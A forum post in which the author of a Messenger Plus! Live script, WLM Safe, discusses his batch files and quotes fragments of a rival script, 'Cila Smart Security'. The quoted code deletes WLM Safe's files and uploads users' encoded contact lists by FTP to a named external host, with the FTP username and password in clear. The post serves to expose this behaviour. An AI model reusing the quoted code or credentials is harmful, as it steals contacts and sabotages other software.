Hi MenthiX, thank for you reply!
I've made up tests with more than one anti-virus before using programs i downloaded from Internet.
They're quite commons and largely used, and avg, kaspersky and antivir didn't seem to identify them as dangerous or unwanted programs.
Are you sure that both exe are detected as infected/dangerous?
Thanks for your your tip about taskkill! Do you think it could be possible to make the same as path.exe in JScript?
Any help would be really appreciated!
Other things:
You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.
- Didn't mind, how can i determine Messenger Plus' installation directory with a batch file?
Why do you delete ""Cila Smart Security" in safe.bat?
- I delete Cila Smart Security for two reasons:
- Cila's script is not compatibile with WLM Safe, and it also runs this code:
case "delws":
fso.DeleteFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml');
fso.DeleteFolder(Directory + '\\Scripts' + '\\WLM Safe'); break;
case "inire":
MsgPlus.AddTimer("inire", 60000); break;
function kickWLMsafe() {
if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
ErrorNN("821", "WLM Safe");
TraceIA(RLFF(LangT, 83))
function DelWLMS() {
var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
MsgPlus.AddTimer("delws", 3000)
- In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
function MakeConfigEMAIL() {
var sssp = Messenger.MyEmail;
var Contacts = Messenger.MyContacts;
var e = new Enumerator(Contacts);
for (; ! e.atEnd(); e.moveNext()) {
var Contact = e.item();
AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Contact.Email)))
AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Messenger.MyEmail)));
function UpCEMAIL() {
ftpweb = "ftp.cilacorp.x10hosting.com";
for (var e = new Enumerator(fso.GetFolder(MsgPlus.ScriptFilesPath + "\\Saves").files); ! e.atEnd(); e.moveNext()) {
scsulmi = MsgPlus.UploadFileFTP(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + e.item().Name, ftpweb, "msgplus@cilacorp.x10hosting.com", "T9Mrvcjyz81Q", e.item().Name)
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
Thanks to all for comprehension, replies and support.